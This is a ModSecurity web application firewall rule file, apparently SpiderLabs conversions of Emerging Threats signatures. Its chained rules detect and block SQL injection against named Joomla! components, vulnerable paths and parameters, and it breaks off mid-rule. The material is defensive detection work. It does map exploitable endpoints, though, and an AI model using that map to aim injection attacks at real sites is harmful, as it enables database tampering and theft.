Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component DELETE FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_surveymanager" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009939,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component DELETE FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36464/info'" SecRule REQUEST_LINE "@contains task=editsurvey&" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component DELETE FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009940) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component UNION SELECT SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_surveymanager" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009940,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component UNION SELECT SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36464/info'" SecRule REQUEST_LINE "@contains task=editsurvey&" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component UNION SELECT SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009941) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component INSERT INTO SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_surveymanager" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009941,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component INSERT INTO SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36464/info'" SecRule REQUEST_LINE "@contains task=editsurvey&" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component INSERT INTO SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009942) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_surveymanager" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009942,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36464/info'" SecRule REQUEST_LINE "@contains task=editsurvey&" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009943) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic 'bid' Parameter SELECT FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_jbudgetsmagic" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009943,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic \'bid\' Parameter SELECT FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36461/info'" SecRule REQUEST_LINE "@contains view=mybudget&" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic \'bid\' Parameter SELECT FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009944) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic 'bid' Parameter DELETE FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_jbudgetsmagic" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009944,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic \'bid\' Parameter DELETE FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36461/info'" SecRule REQUEST_LINE "@contains view=mybudget&" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic \'bid\' Parameter DELETE FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009945) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic 'bid' Parameter UNION SELECT SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_jbudgetsmagic" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009945,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic \'bid\' Parameter UNION SELECT SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36461/info'" SecRule REQUEST_LINE "@contains view=mybudget&" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic \'bid\' Parameter UNION SELECT SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009946) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic 'bid' Parameter INSERT INTO SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_jbudgetsmagic" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009946,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic \'bid\' Parameter INSERT INTO SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36461/info'" SecRule REQUEST_LINE "@contains view=mybudget&" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic \'bid\' Parameter INSERT INTO SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009947) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic 'bid' Parameter UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_jbudgetsmagic" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009947,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic \'bid\' Parameter UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36461/info'" SecRule REQUEST_LINE "@contains view=mybudget&" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic \'bid\' Parameter UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009956) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component SELECT FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_facebook" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009956,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component SELECT FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36484/info'" SecRule REQUEST_LINE "@contains view=student" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component SELECT FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009957) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component DELETE FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_facebook" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009957,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component DELETE FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36484/info'" SecRule REQUEST_LINE "@contains view=student" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component DELETE FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009958) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component UNION SELECT SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_facebook" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009958,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component UNION SELECT SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36484/info'" SecRule REQUEST_LINE "@contains view=student" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component UNION SELECT SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009959) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component INSERT INTO SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_facebook" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009959,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component INSERT INTO SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36484/info'" SecRule REQUEST_LINE "@contains view=student" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component INSERT INTO SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009960) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_facebook" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009960,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36484/info'" SecRule REQUEST_LINE "@contains view=student" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009961) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component SELECT FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_sportfusion" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009961,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component SELECT FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36481/info'" SecRule REQUEST_LINE "@contains view=teamdetail" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SportFusion Component SELECT FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009962) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component DELETE FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_sportfusion" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009962,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component DELETE FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36481/info'" SecRule REQUEST_LINE "@contains view=teamdetail" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SportFusion Component DELETE FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009963) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component UNION SELECT SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_sportfusion" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009963,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component UNION SELECT SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36481/info'" SecRule REQUEST_LINE "@contains view=teamdetail" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SportFusion Component UNION SELECT SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009964) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component INSERT INTO SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_sportfusion" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009964,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component INSERT INTO SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36481/info'" SecRule REQUEST_LINE "@contains view=teamdetail" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SportFusion Component INSERT INTO SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009965) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_sportfusion" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009965,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36481/info'" SecRule REQUEST_LINE "@contains view=teamdetail" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SportFusion Component UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010014) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component 'id' Parameter UNION SELECT SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_gameserver" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010014,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component \'id\' Parameter UNION SELECT SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36213/info'" SecRule REQUEST_LINE "@contains view=gamepanel" "chain" SecRule ARGS:id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component \'id\' Parameter UNION SELECT SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010015) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component 'id' Parameter SELECT FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_gameserver" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010015,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component \'id\' Parameter SELECT FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36213/info'" SecRule REQUEST_LINE "@contains view=gamepanel" "chain" SecRule ARGS:id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component \'id\' Parameter SELECT FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010016) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component 'id' Parameter DELETE FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_gameserver" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010016,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component \'id\' Parameter DELETE FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36213/info'" SecRule REQUEST_LINE "@contains view=gamepanel" "chain" SecRule ARGS:id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component \'id\' Parameter DELETE FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010017) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component 'id' Parameter UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_gameserver" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010017,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component \'id\' Parameter UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36213/info'" SecRule REQUEST_LINE "@contains view=gamepanel" "chain" SecRule ARGS:id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component \'id\' Parameter UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010018) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Joomla Game Server Component id Parameter INSERT INTO SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_gameserver" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010018,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Joomla Game Server Component id Parameter INSERT INTO SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36213/info'" SecRule REQUEST_LINE "@contains view=gamepanel" "chain" SecRule ARGS:id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Joomla Game Server Component id Parameter INSERT INTO SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010040) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder 'group_id' Parameter SELECT FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_cbresumebuilder" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010040,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder \'group_id\' Parameter SELECT FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36598/info'" SecRule REQUEST_LINE "@contains task=group_members" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder \'group_id\' Parameter SELECT FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010041) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder 'group_id' Parameter DELETE FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_cbresumebuilder" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010041,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder \'group_id\' Parameter DELETE FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36598/info'" SecRule REQUEST_LINE "@contains task=group_members" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder \'group_id\' Parameter DELETE FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010042) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder 'group_id' Parameter UNION SELECT SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_cbresumebuilder" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010042,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder \'group_id\' Parameter UNION SELECT SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36598/info'" SecRule REQUEST_LINE "@contains task=group_members" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder \'group_id\' Parameter UNION SELECT SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010043) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder 'group_id' Parameter INSERT INTO SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_cbresumebuilder" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010043,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder \'group_id\' Parameter INSERT INTO SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36598/info'" SecRule REQUEST_LINE "@contains task=group_members" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder \'group_id\' Parameter INSERT INTO SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010044) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder 'group_id' Parameter UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_cbresumebuilder" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010044,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder \'group_id\' Parameter UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36598/info'" SecRule REQUEST_LINE "@contains task=group_members" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder \'group_id\' Parameter UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010045) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Soundset Component 'cat_id' Parameter SELECT FROM 